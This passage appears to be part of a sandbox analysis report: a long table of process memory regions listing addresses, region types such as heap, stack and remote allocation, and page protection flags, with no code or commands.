7FF848E60000
|
trusted library allocation
|
page read and write
|
||
|
24CE6010000
|
heap
|
page read and write
|
||
|
F96F3F7000
|
stack
|
page read and write
|
||
|
CE7AB7F000
|
stack
|
page read and write
|
||
|
21E24710000
|
trusted library allocation
|
page read and write
|
||
|
21E2468E000
|
trusted library allocation
|
page read and write
|
||
|
24CE5D44000
|
heap
|
page read and write
|
||
|
7FF848E20000
|
trusted library allocation
|
page execute and read and write
|
||
|
286D7780000
|
heap
|
page read and write
|
||
|
21E23D1C000
|
trusted library allocation
|
page read and write
|
||
|
21E24882000
|
trusted library allocation
|
page read and write
|
||
|
15046201000
|
trusted library allocation
|
page read and write
|
||
|
320E000
|
stack
|
page read and write
|
||
|
A29C1BE000
|
stack
|
page read and write
|
||
|
1C40E0A9000
|
heap
|
page read and write
|
||
|
24FC4C2B000
|
trusted library allocation
|
page read and write
|
||
|
1C40C127000
|
heap
|
page read and write
|
||
|
21E24791000
|
trusted library allocation
|
page read and write
|
||
|
F96F678000
|
stack
|
page read and write
|
||
|
7FF848D0C000
|
trusted library allocation
|
page execute and read and write
|
||
|
1C40DAC0000
|
trusted library allocation
|
page read and write
|
||
|
7FF848CBC000
|
trusted library allocation
|
page execute and read and write
|
||
|
24FB61AA000
|
trusted library allocation
|
page read and write
|
||
|
21E21C20000
|
heap
|
page read and write
|
||
|
260B1AF0000
|
heap
|
page execute and read and write
|
||
|
90BD4FF000
|
stack
|
page read and write
|
||
|
15045F81000
|
trusted library allocation
|
page read and write
|
||
|
1400000
|
heap
|
page read and write
|
||
|
B40000
|
heap
|
page read and write
|
||
|
A29BC7E000
|
stack
|
page read and write
|
||
|
12FC69EA000
|
trusted library allocation
|
page read and write
|
||
|
286BF530000
|
trusted library allocation
|
page read and write
|
||
|
79C0BE000
|
stack
|
page read and write
|
||
|
7FF848CE0000
|
trusted library allocation
|
page read and write
|
||
|
7FF848E7E000
|
trusted library allocation
|
page read and write
|
||
|
7FF848CE0000
|
trusted library allocation
|
page execute and read and write
|
||
|
F96F77E000
|
stack
|
page read and write
|
||
|
1C717B90000
|
heap
|
page readonly
|
||
|
3C2E000
|
stack
|
page read and write
|
||
|
24CE60AC000
|
heap
|
page read and write
|
||
|
90BD978000
|
stack
|
page read and write
|
||
|
7FF848C80000
|
trusted library allocation
|
page read and write
|
||
|
24FB4720000
|
heap
|
page read and write
|
||
|
21E248BE000
|
trusted library allocation
|
page read and write
|
||
|
1C40C3B4000
|
heap
|
page read and write
|
||
|
1C71885A000
|
trusted library allocation
|
page read and write
|
||
|
7FF848F30000
|
trusted library allocation
|
page read and write
|
||
|
7FF848F93000
|
trusted library allocation
|
page read and write
|
||
|
24CE5B76000
|
heap
|
page read and write
|
||
|
12FDD6EB000
|
heap
|
page read and write
|
||
|
21E24896000
|
trusted library allocation
|
page read and write
|
||
|
12FC4D80000
|
trusted library allocation
|
page read and write
|
||
|
7FF848E80000
|
trusted library allocation
|
page read and write
|
||
|
1504E7E9000
|
heap
|
page read and write
|
||
|
1336000
|
heap
|
page read and write
|
||
|
CFC000
|
stack
|
page read and write
|
||
|
21E246E8000
|
trusted library allocation
|
page read and write
|
||
|
15034302000
|
heap
|
page read and write
|
||
|
21E3BE2F000
|
heap
|
page read and write
|
||
|
7FF848C24000
|
trusted library allocation
|
page read and write
|
||
|
7FF848C3D000
|
trusted library allocation
|
page execute and read and write
|
||
|
21E24845000
|
trusted library allocation
|
page read and write
|
||
|
24CE5D51000
|
heap
|
page read and write
|
||
|
12FDD6AE000
|
heap
|
page read and write
|
||
|
7FF848EB0000
|
trusted library allocation
|
page read and write
|
||
|
24FCD095000
|
heap
|
page read and write
|
||
|
260B1B7A000
|
trusted library allocation
|
page read and write
|
||
|
21E3BD7E000
|
heap
|
page read and write
|
||
|
24CE5B40000
|
heap
|
page read and write
|
||
|
24FCCD00000
|
heap
|
page read and write
|
||
|
79BEB7000
|
stack
|
page read and write
|
||
|
24FB2E35000
|
heap
|
page read and write
|
||
|
286BFB19000
|
trusted library allocation
|
page read and write
|
||
|
24CE5D3C000
|
heap
|
page read and write
|
||
|
12FC6C74000
|
trusted library allocation
|
page read and write
|
||
|
48A20BE000
|
stack
|
page read and write
|
||
|
1C717B80000
|
trusted library allocation
|
page read and write
|
||
|
12FC5506000
|
trusted library allocation
|
page read and write
|
||
|
7FF849030000
|
trusted library allocation
|
page read and write
|
||
|
F9702CE000
|
stack
|
page read and write
|
||
|
90BD9FA000
|
stack
|
page read and write
|
||
|
7FF848E24000
|
trusted library allocation
|
page read and write
|
||
|
48A1EBE000
|
stack
|
page read and write
|
||
|
15037778000
|
trusted library allocation
|
page read and write
|
||
|
79C23B000
|
stack
|
page read and write
|
||
|
21E24731000
|
trusted library allocation
|
page read and write
|
||
|
15037D36000
|
trusted library allocation
|
page read and write
|
||
|
1504E2C4000
|
heap
|
page read and write
|
||
|
7FF848FD0000
|
trusted library allocation
|
page read and write
|
||
|
33DE000
|
stack
|
page read and write
|
||
|
7FF848F60000
|
trusted library allocation
|
page read and write
|
||
|
7FF848ED0000
|
trusted library allocation
|
page read and write
|
||
|
7FF848FB9000
|
trusted library allocation
|
page read and write
|
||
|
1C71836C000
|
trusted library allocation
|
page read and write
|
||
|
79BDF9000
|
stack
|
page read and write
|
||
|
286D7A67000
|
heap
|
page read and write
|
||
|
24FCCE17000
|
heap
|
page execute and read and write
|
||
|
BF2167E000
|
stack
|
page read and write
|
||
|
7DF4EC8F0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF848E60000
|
trusted library allocation
|
page read and write
|
||
|
3820000
|
heap
|
page read and write
|
||
|
24FCD0EB000
|
heap
|
page read and write
|
||
|
970000
|
heap
|
page read and write
|
||
|
7C4FFAA000
|
stack
|
page read and write
|
||
|
286BD9C0000
|
heap
|
page read and write
|
||
|
24CE3EB5000
|
heap
|
page read and write
|
||
|
7FF848F20000
|
trusted library allocation
|
page read and write
|
||
|
7FF848C23000
|
trusted library allocation
|
page execute and read and write
|
||
|
1C40C132000
|
heap
|
page read and write
|
||
|
21E21EB0000
|
trusted library allocation
|
page read and write
|
||
|
7FF848F50000
|
trusted library allocation
|
page read and write
|
||
|
474000
|
remote allocation
|
page execute and read and write
|
||
|
1C716188000
|
heap
|
page read and write
|
||
|
150345E0000
|
heap
|
page read and write
|
||
|
7C50AFF000
|
stack
|
page read and write
|
||
|
7FF848E20000
|
trusted library allocation
|
page execute and read and write
|
||
|
1C40EAAF000
|
trusted library allocation
|
page read and write
|
||
|
1C716190000
|
heap
|
page read and write
|
||
|
7FF848EA0000
|
trusted library allocation
|
page read and write
|
||
|
7FF848EE0000
|
trusted library allocation
|
page read and write
|
||
|
24CE5D10000
|
heap
|
page read and write
|
||
|
24CE5B48000
|
heap
|
page read and write
|
||
|
21E247F9000
|
trusted library allocation
|
page read and write
|
||
|
12FDD6D3000
|
heap
|
page read and write
|
||
|
3320000
|
heap
|
page read and write
|
||
|
7FF848E48000
|
trusted library allocation
|
page read and write
|
||
|
7FF848D26000
|
trusted library allocation
|
page execute and read and write
|
||
|
260B2055000
|
trusted library allocation
|
page read and write
|
||
|
21E24793000
|
trusted library allocation
|
page read and write
|
||
|
12FDD6E6000
|
heap
|
page read and write
|
||
|
45C000
|
system
|
page execute and read and write
|
||
|
473000
|
system
|
page execute and read and write
|
||
|
474000
|
remote allocation
|
page execute and read and write
|
||
|
10D6000
|
stack
|
page read and write
|
||
|
48A223C000
|
stack
|
page read and write
|
||
|
21E24293000
|
trusted library allocation
|
page read and write
|
||
|
7FF848E40000
|
trusted library allocation
|
page execute and read and write
|
||
|
24CE5B49000
|
heap
|
page read and write
|
||
|
21E23D2C000
|
trusted library allocation
|
page read and write
|
||
|
164B77E000
|
stack
|
page read and write
|
||
|
7FF848E10000
|
trusted library allocation
|
page execute and read and write
|
||
|
F96EF3E000
|
unkown
|
page read and write
|
||
|
1C7185F9000
|
trusted library allocation
|
page read and write
|
||
|
1C40DA50000
|
heap
|
page read and write
|
||
|
260CA079000
|
heap
|
page read and write
|
||
|
188329A0000
|
heap
|
page read and write
|
||
|
7FF848F50000
|
trusted library allocation
|
page read and write
|
||
|
21E24365000
|
trusted library allocation
|
page read and write
|
||
|
7C506FF000
|
stack
|
page read and write
|
||
|
1C40E902000
|
trusted library allocation
|
page read and write
|
||
|
21E248C5000
|
trusted library allocation
|
page read and write
|
||
|
7FF848E90000
|
trusted library allocation
|
page read and write
|
||
|
1C40E210000
|
heap
|
page execute and read and write
|
||
|
7FF848E35000
|
trusted library allocation
|
page read and write
|
||
|
7FF848EA0000
|
trusted library allocation
|
page read and write
|
||
|
1C718C2D000
|
trusted library allocation
|
page read and write
|
||
|
1C41E29D000
|
trusted library allocation
|
page read and write
|
||
|
260B0070000
|
heap
|
page read and write
|
||
|
7FF848C4D000
|
trusted library allocation
|
page execute and read and write
|
||
|
286CF671000
|
trusted library allocation
|
page read and write
|
||
|
12FDD6C1000
|
heap
|
page read and write
|
||
|
286BD681000
|
heap
|
page read and write
|
||
|
12FC66CF000
|
trusted library allocation
|
page read and write
|
||
|
12FDD6A0000
|
heap
|
page read and write
|
||
|
7FF848DEA000
|
trusted library allocation
|
page read and write
|
||
|
24CE60AC000
|
heap
|
page read and write
|
||
|
164BA3F000
|
stack
|
page read and write
|
||
|
12FDD53B000
|
heap
|
page read and write
|
||
|
7FF849033000
|
trusted library allocation
|
page read and write
|
||
|
12FD512B000
|
trusted library allocation
|
page read and write
|
||
|
24FB4780000
|
heap
|
page readonly
|
||
|
24FB56F4000
|
trusted library allocation
|
page read and write
|
||
|
2D10000
|
heap
|
page read and write
|
||
|
24CE5D21000
|
heap
|
page read and write
|
||
|
7FF848C6B000
|
trusted library allocation
|
page read and write
|
||
|
21E248AB000
|
trusted library allocation
|
page read and write
|
||
|
7FF848EF4000
|
trusted library allocation
|
page read and write
|
||
|
7FF848F90000
|
trusted library allocation
|
page read and write
|
||
|
1C40C1A8000
|
heap
|
page read and write
|
||
|
1C7304A0000
|
heap
|
page read and write
|
||
|
7FF848E80000
|
trusted library allocation
|
page read and write
|
||
|
24FB6744000
|
trusted library allocation
|
page read and write
|
||
|
188328C0000
|
heap
|
page read and write
|
||
|
15034375000
|
heap
|
page read and write
|
||
|
7FF848C40000
|
trusted library allocation
|
page read and write
|
||
|
24FC4C49000
|
trusted library allocation
|
page read and write
|
||
|
14C0000
|
heap
|
page read and write
|
||
|
48A2038000
|
stack
|
page read and write
|
||
|
24FB58A2000
|
trusted library allocation
|
page read and write
|
||
|
286D7A72000
|
heap
|
page read and write
|
||
|
24FB616B000
|
trusted library allocation
|
page read and write
|
||
|
1C426320000
|
heap
|
page read and write
|
||
|
1C73021D000
|
heap
|
page read and write
|
||
|
7FF848F80000
|
trusted library allocation
|
page read and write
|
||
|
15045F11000
|
trusted library allocation
|
page read and write
|
||
|
12FC66A9000
|
trusted library allocation
|
page read and write
|
||
|
21E237A0000
|
trusted library allocation
|
page read and write
|
||
|
24CE5B79000
|
heap
|
page read and write
|
||
|
24FC4C39000
|
trusted library allocation
|
page read and write
|
||
|
286BFB4D000
|
trusted library allocation
|
page read and write
|
||
|
3420000
|
heap
|
page read and write
|
||
|
1C730397000
|
heap
|
page execute and read and write
|
||
|
260CA190000
|
heap
|
page read and write
|
||
|
155F000
|
stack
|
page read and write
|
||
|
1C40C0F0000
|
heap
|
page read and write
|
||
|
7FF848EC0000
|
trusted library allocation
|
page read and write
|
||
|
7FF848EE0000
|
trusted library allocation
|
page read and write
|
||
|
1530000
|
heap
|
page read and write
|
||
|
7FF848E40000
|
trusted library allocation
|
page read and write
|
||
|
7FF848D0C000
|
trusted library allocation
|
page execute and read and write
|
||
|
1C40EC78000
|
trusted library allocation
|
page read and write
|
||
|
7FF848E90000
|
trusted library allocation
|
page read and write
|
||
|
21E24C05000
|
trusted library allocation
|
page read and write
|
||
|
7FF848EB0000
|
trusted library allocation
|
page read and write
|
||
|
24CE5D11000
|
heap
|
page read and write
|
||
|
210304E0000
|
heap
|
page read and write
|
||
|
1C718A04000
|
trusted library allocation
|
page read and write
|
||
|
7FF848EB0000
|
trusted library allocation
|
page read and write
|
||
|
21E3BF59000
|
heap
|
page read and write
|
||
|
15045F31000
|
trusted library allocation
|
page read and write
|
||
|
21E24348000
|
trusted library allocation
|
page read and write
|
||
|
164B9B8000
|
stack
|
page read and write
|
||
|
286BD9C5000
|
heap
|
page read and write
|
||
|
21E3BD69000
|
heap
|
page read and write
|
||
|
1504E690000
|
heap
|
page read and write
|
||
|
7FF848F30000
|
trusted library allocation
|
page read and write
|
||
|
286BD6CC000
|
heap
|
page read and write
|
||
|
12FD59FB000
|
trusted library allocation
|
page read and write
|
||
|
286BD6F0000
|
heap
|
page read and write
|
||
|
D9C000
|
stack
|
page read and write
|
||
|
286BD630000
|
heap
|
page read and write
|
||
|
24CE6018000
|
heap
|
page read and write
|
||
|
12FD4F51000
|
trusted library allocation
|
page read and write
|
||
|
24CE5D14000
|
heap
|
page read and write
|
||
|
260CA180000
|
heap
|
page execute and read and write
|
||
|
7FF848E00000
|
trusted library allocation
|
page read and write
|
||
|
F96F27F000
|
stack
|
page read and write
|
||
|
286BFDAA000
|
trusted library allocation
|
page read and write
|
||
|
2CE0000
|
heap
|
page read and write
|
||
|
BF21A3F000
|
stack
|
page read and write
|
||
|
21E21EE0000
|
heap
|
page read and write
|
||
|
260B1CBE000
|
trusted library allocation
|
page read and write
|
||
|
7FF848EF0000
|
trusted library allocation
|
page read and write
|
||
|
7FF848E15000
|
trusted library allocation
|
page read and write
|
||
|
7FF848D36000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF848F20000
|
trusted library allocation
|
page read and write
|
||
|
21E24866000
|
trusted library allocation
|
page read and write
|
||
|
7FF848E90000
|
trusted library allocation
|
page read and write
|
||
|
21E21E70000
|
heap
|
page read and write
|
||
|
F96F37E000
|
stack
|
page read and write
|
||
|
7FF848C50000
|
trusted library allocation
|
page read and write
|
||
|
7FF848EF0000
|
trusted library allocation
|
page read and write
|
||
|
64F65FF000
|
unkown
|
page read and write
|
||
|
12FC66D7000
|
trusted library allocation
|
page read and write
|
||
|
24FB61D1000
|
trusted library allocation
|
page read and write
|
||
|
7FF848FD0000
|
trusted library allocation
|
page read and write
|
||
|
BF21938000
|
stack
|
page read and write
|
||
|
24FCD019000
|
heap
|
page read and write
|
||
|
24CE5B0F000
|
heap
|
page read and write
|
||
|
A29BD7E000
|
stack
|
page read and write
|
||
|
7FF848E10000
|
trusted library allocation
|
page execute and read and write
|
||
|
1C730140000
|
heap
|
page read and write
|
||
|
24FB49BE000
|
trusted library allocation
|
page read and write
|
||
|
12FDD52F000
|
heap
|
page read and write
|
||
|
13EE000
|
heap
|
page read and write
|
||
|
7FF848EF0000
|
trusted library allocation
|
page read and write
|
||
|
7FF848E80000
|
trusted library allocation
|
page read and write
|
||
|
150342D0000
|
heap
|
page read and write
|
||
|
260B0040000
|
heap
|
page readonly
|
||
|
7FF848E0A000
|
trusted library allocation
|
page read and write
|
||
|
1C40E221000
|
trusted library allocation
|
page read and write
|
||
|
1504E791000
|
heap
|
page read and write
|
||
|
164BB3E000
|
stack
|
page read and write
|
||
|
BF21779000
|
stack
|
page read and write
|
||
|
150461FA000
|
trusted library allocation
|
page read and write
|
||
|
24FC4C31000
|
trusted library allocation
|
page read and write
|
||
|
7FF848E30000
|
trusted library allocation
|
page read and write
|
||
|
7FF848C62000
|
trusted library allocation
|
page read and write
|
||
|
210304C0000
|
heap
|
page read and write
|
||
|
12FC34CA000
|
heap
|
page read and write
|
||
|
7FF848C32000
|
trusted library allocation
|
page read and write
|
||
|
24FB6292000
|
trusted library allocation
|
page read and write
|
||
|
7FF848D06000
|
trusted library allocation
|
page execute and read and write
|
||
|
15046219000
|
trusted library allocation
|
page read and write
|
||
|
21E3C180000
|
heap
|
page read and write
|
||
|
1C40E200000
|
trusted library section
|
page read and write
|
||
|
7FF848E60000
|
trusted library allocation
|
page read and write
|
||
|
7FF848EB0000
|
trusted library allocation
|
page read and write
|
||
|
1C718C1F000
|
trusted library allocation
|
page read and write
|
||
|
7FF848FC8000
|
trusted library allocation
|
page read and write
|
||
|
24FCCEF0000
|
heap
|
page read and write
|
||
|
7FF848E50000
|
trusted library allocation
|
page read and write
|
||
|
7FF848F00000
|
trusted library allocation
|
page read and write
|
||
|
21E3C190000
|
heap
|
page read and write
|
||
|
286BF570000
|
trusted library allocation
|
page read and write
|
||
|
21E248A2000
|
trusted library allocation
|
page read and write
|
||
|
21E21C82000
|
heap
|
page read and write
|
||
|
7FF8490B0000
|
trusted library allocation
|
page read and write
|
||
|
48A1E79000
|
stack
|
page read and write
|
||
|
21E21C7E000
|
heap
|
page read and write
|
||
|
12FC000
|
stack
|
page read and write
|
||
|
24FCD145000
|
heap
|
page read and write
|
||
|
15E0000
|
heap
|
page read and write
|
||
|
21E247FD000
|
trusted library allocation
|
page read and write
|
||
|
1C718660000
|
trusted library allocation
|
page read and write
|
||
|
7FF848F99000
|
trusted library allocation
|
page read and write
|
||
|
21E24454000
|
trusted library allocation
|
page read and write
|
||
|
A29BCFB000
|
stack
|
page read and write
|
||
|
7FF848E60000
|
trusted library allocation
|
page read and write
|
||
|
21E2481B000
|
trusted library allocation
|
page read and write
|
||
|
1150000
|
heap
|
page read and write
|
||
|
21E2485F000
|
trusted library allocation
|
page read and write
|
||
|
21E248D4000
|
trusted library allocation
|
page read and write
|
||
|
A40000
|
heap
|
page read and write
|
||
|
18832A40000
|
heap
|
page read and write
|
||
|
24CE5B78000
|
heap
|
page read and write
|
||
|
F96EFFE000
|
stack
|
page read and write
|
||
|
24FCCEC0000
|
heap
|
page execute and read and write
|
||
|
7FF848E70000
|
trusted library allocation
|
page read and write
|
||
|
7FF848D40000
|
trusted library allocation
|
page execute and read and write
|
||
|
12FD4F60000
|
trusted library allocation
|
page read and write
|
||
|
1C7162B0000
|
heap
|
page read and write
|
||
|
24FB2E31000
|
heap
|
page read and write
|
||
|
DDD4FF000
|
stack
|
page read and write
|
||
|
7FF848E60000
|
trusted library allocation
|
page read and write
|
||
|
21E3BDDD000
|
heap
|
page read and write
|
||
|
7FF848EC0000
|
trusted library allocation
|
page read and write
|
||
|
1C7185D6000
|
trusted library allocation
|
page read and write
|
||
|
15036C85000
|
trusted library allocation
|
page read and write
|
||
|
24FCCF10000
|
heap
|
page read and write
|
||
|
12FDD57C000
|
heap
|
page read and write
|
||
|
12FC535F000
|
trusted library allocation
|
page read and write
|
||
|
1C40E0C9000
|
heap
|
page read and write
|
||
|
260AFFD0000
|
heap
|
page read and write
|
||
|
D00000
|
heap
|
page read and write
|
||
|
7FF848F40000
|
trusted library allocation
|
page read and write
|
||
|
260C9FF9000
|
heap
|
page read and write
|
||
|
7FF848E30000
|
trusted library allocation
|
page execute and read and write
|
||
|
12FC6A53000
|
trusted library allocation
|
page read and write
|
||
|
90BD8FC000
|
stack
|
page read and write
|
||
|
12FC6A2D000
|
trusted library allocation
|
page read and write
|
||
|
7FF848EB0000
|
trusted library allocation
|
page read and write
|
||
|
21E21C74000
|
heap
|
page read and write
|
||
|
21E24BE0000
|
trusted library allocation
|
page read and write
|
||
|
7FF848E40000
|
trusted library allocation
|
page execute and read and write
|
||
|
286D7A95000
|
heap
|
page read and write
|
||
|
24CE5D24000
|
heap
|
page read and write
|
||
|
7DF4EC8D0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1C40C1C3000
|
heap
|
page read and write
|
||
|
7FF848F10000
|
trusted library allocation
|
page read and write
|
||
|
41B000
|
system
|
page execute and read and write
|
||
|
1C716131000
|
heap
|
page read and write
|
||
|
21E2447A000
|
trusted library allocation
|
page read and write
|
||
|
7FF848C63000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF848E80000
|
trusted library allocation
|
page read and write
|
||
|
7FF848EC0000
|
trusted library allocation
|
page read and write
|
||
|
24FB4E0E000
|
trusted library allocation
|
page read and write
|
||
|
79CD0C000
|
stack
|
page read and write
|
||
|
7FF848D46000
|
trusted library allocation
|
page execute and read and write
|
||
|
FC0000
|
heap
|
page read and write
|
||
|
12FC5172000
|
trusted library allocation
|
page read and write
|
||
|
7FF848D10000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF848F30000
|
trusted library allocation
|
page read and write
|
||
|
7FF848C53000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF848FC0000
|
trusted library allocation
|
page read and write
|
||
|
12FC3545000
|
heap
|
page read and write
|
||
|
21E2478B000
|
trusted library allocation
|
page read and write
|
||
|
2D42000
|
heap
|
page read and write
|
||
|
21E3BD60000
|
heap
|
page read and write
|
||
|
12FC555F000
|
trusted library allocation
|
page read and write
|
||
|
CE7ABFE000
|
stack
|
page read and write
|
||
|
12FC3444000
|
heap
|
page read and write
|
||
|
15036FD0000
|
trusted library allocation
|
page read and write
|
||
|
7FF848DE1000
|
trusted library allocation
|
page read and write
|
||
|
7FF848C9C000
|
trusted library allocation
|
page execute and read and write
|
||
|
48A213E000
|
stack
|
page read and write
|
||
|
21E2488F000
|
trusted library allocation
|
page read and write
|
||
|
7FF848C53000
|
trusted library allocation
|
page execute and read and write
|
||
|
21E3BF1B000
|
heap
|
page read and write
|
||
|
24CE3CC0000
|
heap
|
page read and write
|
||
|
260B1AC0000
|
heap
|
page execute and read and write
|
||
|
24FCD046000
|
heap
|
page read and write
|
||
|
7FF848E90000
|
trusted library allocation
|
page read and write
|
||
|
12FC66C7000
|
trusted library allocation
|
page read and write
|
||
|
12FC3410000
|
heap
|
page read and write
|
||
|
260B0030000
|
trusted library allocation
|
page read and write
|
||
|
434B000
|
heap
|
page read and write
|
||
|
7FF848FCC000
|
trusted library allocation
|
page read and write
|
||
|
10DB000
|
stack
|
page read and write
|
||
|
7FF8490C0000
|
trusted library allocation
|
page read and write
|
||
|
24CE5BA5000
|
heap
|
page read and write
|
||
|
119E000
|
stack
|
page read and write
|
||
|
1C40E6C9000
|
trusted library allocation
|
page read and write
|
||
|
260B1C6E000
|
trusted library allocation
|
page read and write
|
||
|
286BD70A000
|
heap
|
page read and write
|
||
|
45D000
|
system
|
page execute and read and write
|
||
|
7C50BFB000
|
stack
|
page read and write
|
||
|
79BCFB000
|
stack
|
page read and write
|
||
|
24CE5BFD000
|
heap
|
page read and write
|
||
|
7FF848D06000
|
trusted library allocation
|
page read and write
|
||
|
18832C24000
|
heap
|
page read and write
|
||
|
79BB7E000
|
stack
|
page read and write
|
||
|
24FCD168000
|
heap
|
page read and write
|
||
|
12FC550E000
|
trusted library allocation
|
page read and write
|
||
|
1C728141000
|
trusted library allocation
|
page read and write
|
||
|
21E2473A000
|
trusted library allocation
|
page read and write
|
||
|
286BF4F0000
|
heap
|
page readonly
|
||
|
24FC4961000
|
trusted library allocation
|
page read and write
|
||
|
12FD517C000
|
trusted library allocation
|
page read and write
|
||
|
24CE5B78000
|
heap
|
page read and write
|
||
|
12FC6A5E000
|
trusted library allocation
|
page read and write
|
||
|
79BE3E000
|
stack
|
page read and write
|
||
|
7FF848C44000
|
trusted library allocation
|
page read and write
|
||
|
24CE5B78000
|
heap
|
page read and write
|
||
|
150341D0000
|
heap
|
page read and write
|
||
|
260B1E84000
|
trusted library allocation
|
page read and write
|
||
|
21E237E0000
|
heap
|
page read and write
|
||
|
1358000
|
heap
|
page read and write
|
||
|
7FF848D50000
|
trusted library allocation
|
page execute and read and write
|
||
|
21E24677000
|
trusted library allocation
|
page read and write
|
||
|
136B000
|
heap
|
page read and write
|
||
|
24CE5B78000
|
heap
|
page read and write
|
||
|
A29BA7F000
|
stack
|
page read and write
|
||
|
21E21EE5000
|
heap
|
page read and write
|
||
|
12FC5583000
|
trusted library allocation
|
page read and write
|
||
|
7FF848F50000
|
trusted library allocation
|
page read and write
|
||
|
15037033000
|
trusted library allocation
|
page read and write
|
||
|
7FF848DF0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF848DF0000
|
trusted library allocation
|
page read and write
|
||
|
21E21ED0000
|
trusted library allocation
|
page read and write
|
||
|
E40000
|
heap
|
page read and write
|
||
|
7FF848D70000
|
trusted library allocation
|
page execute and read and write
|
||
|
BF21143000
|
stack
|
page read and write
|
||
|
7FF848DE2000
|
trusted library allocation
|
page read and write
|
||
|
4351000
|
heap
|
page read and write
|
||
|
12FC66EB000
|
trusted library allocation
|
page read and write
|
||
|
7FF848D70000
|
trusted library allocation
|
page execute and read and write
|
||
|
1C718A47000
|
trusted library allocation
|
page read and write
|
||
|
15035F11000
|
trusted library allocation
|
page read and write
|
||
|
24CE5BC2000
|
heap
|
page read and write
|
||
|
12FC34A0000
|
trusted library allocation
|
page read and write
|
||
|
12FC3509000
|
heap
|
page read and write
|
||
|
260B1C85000
|
trusted library allocation
|
page read and write
|
||
|
1504E6A6000
|
heap
|
page read and write
|
||
|
260CA09B000
|
heap
|
page read and write
|
||
|
21E24892000
|
trusted library allocation
|
page read and write
|
||
|
A29BB7E000
|
stack
|
page read and write
|
||
|
7FF848E70000
|
trusted library allocation
|
page read and write
|
||
|
24FB671F000
|
trusted library allocation
|
page read and write
|
||
|
CE7AA7C000
|
stack
|
page read and write
|
||
|
210306B5000
|
heap
|
page read and write
|
||
|
7FF848DE0000
|
trusted library allocation
|
page read and write
|
||
|
7FF848EA0000
|
trusted library allocation
|
page read and write
|
||
|
260C1B70000
|
trusted library allocation
|
page read and write
|
||
|
7FF848C42000
|
trusted library allocation
|
page read and write
|
||
|
F96EFBF000
|
stack
|
page read and write
|
||
|
1C72835F000
|
trusted library allocation
|
page read and write
|
||
|
7FF848FA8000
|
trusted library allocation
|
page read and write
|
||
|
7FF848FC0000
|
trusted library allocation
|
page read and write
|
||
|
CFE000
|
stack
|
page read and write
|
||
|
286BF060000
|
heap
|
page read and write
|
||
|
1C40E2A7000
|
trusted library allocation
|
page read and write
|
||
|
7FF848C60000
|
trusted library allocation
|
page read and write
|
||
|
1C730176000
|
heap
|
page read and write
|
||
|
7FF848F30000
|
trusted library allocation
|
page read and write
|
||
|
1C42637F000
|
heap
|
page read and write
|
||
|
1C40E72C000
|
trusted library allocation
|
page read and write
|
||
|
7FF848F20000
|
trusted library allocation
|
page read and write
|
||
|
7FF848D70000
|
trusted library allocation
|
page execute and read and write
|
||
|
164B7F9000
|
stack
|
page read and write
|
||
|
153E000
|
heap
|
page read and write
|
||
|
79CD8E000
|
stack
|
page read and write
|
||
|
1C718130000
|
heap
|
page read and write
|
||
|
21E3BE38000
|
heap
|
page read and write
|
||
|
1C718692000
|
trusted library allocation
|
page read and write
|
||
|
260B1C82000
|
trusted library allocation
|
page read and write
|
||
|
210303E0000
|
heap
|
page read and write
|
||
|
7FF848ED0000
|
trusted library allocation
|
page read and write
|
||
|
7FF848EF0000
|
trusted library allocation
|
page read and write
|
||
|
260AFF90000
|
heap
|
page read and write
|
||
|
12FC54E0000
|
trusted library allocation
|
page read and write
|
||
|
79BAFE000
|
stack
|
page read and write
|
||
|
2AB0000
|
heap
|
page read and write
|
||
|
7FF848E20000
|
trusted library allocation
|
page execute and read and write
|
||
|
13D8000
|
heap
|
page read and write
|
||
|
90BD87A000
|
stack
|
page read and write
|
||
|
15034338000
|
heap
|
page read and write
|
||
|
24CE5E11000
|
heap
|
page read and write
|
||
|
7FF848F40000
|
trusted library allocation
|
page read and write
|
||
|
21E3BE3D000
|
heap
|
page read and write
|
||
|
7FF848EE0000
|
trusted library allocation
|
page read and write
|
||
|
A29BDFD000
|
stack
|
page read and write
|
||
|
7FF848EB0000
|
trusted library allocation
|
page read and write
|
||
|
48A1C7B000
|
stack
|
page read and write
|
||
|
7FF848D06000
|
trusted library allocation
|
page read and write
|
||
|
7FF848DF1000
|
trusted library allocation
|
page read and write
|
||
|
79C03E000
|
stack
|
page read and write
|
||
|
24CE5D72000
|
heap
|
page read and write
|
||
|
7DF4F7860000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF848E40000
|
trusted library allocation
|
page execute and read and write
|
||
|
286CF6E2000
|
trusted library allocation
|
page read and write
|
||
|
7FF848F30000
|
trusted library allocation
|
page read and write
|
||
|
24FCD155000
|
heap
|
page read and write
|
||
|
21E2426A000
|
trusted library allocation
|
page read and write
|
||
|
1503779F000
|
trusted library allocation
|
page read and write
|
||
|
7FF848E60000
|
trusted library allocation
|
page read and write
|
||
|
286BF6EC000
|
trusted library allocation
|
page read and write
|
||
|
12FD524A000
|
trusted library allocation
|
page read and write
|
||
|
1C40E060000
|
heap
|
page read and write
|
||
|
24CE60AC000
|
heap
|
page read and write
|
||
|
21E23BB0000
|
heap
|
page execute and read and write
|
||
|
21E23C60000
|
trusted library allocation
|
page read and write
|
||
|
7FF848F50000
|
trusted library allocation
|
page read and write
|
||
|
286CF70E000
|
trusted library allocation
|
page read and write
|
||
|
260B00AF000
|
heap
|
page read and write
|
||
|
24FB2E2D000
|
heap
|
page read and write
|
||
|
7FF848E50000
|
trusted library allocation
|
page read and write
|
||
|
1C7161E0000
|
heap
|
page read and write
|
||
|
1C40C3B0000
|
heap
|
page read and write
|
||
|
48A1B7D000
|
stack
|
page read and write
|
||
|
24CE5F67000
|
heap
|
page read and write
|
||
|
21E3BF10000
|
heap
|
page read and write
|
||
|
2D23000
|
heap
|
page read and write
|
||
|
7FF848E60000
|
trusted library allocation
|
page read and write
|
||
|
1503433C000
|
heap
|
page read and write
|
||
|
12FC556D000
|
trusted library allocation
|
page read and write
|
||
|
12FDD497000
|
heap
|
page execute and read and write
|
||
|
7FF848F60000
|
trusted library allocation
|
page read and write
|
||
|
330F000
|
stack
|
page read and write
|
||
|
150343B8000
|
heap
|
page read and write
|
||
|
1C718670000
|
trusted library allocation
|
page read and write
|
||
|
1C40C0D0000
|
heap
|
page read and write
|
||
|
F4F000
|
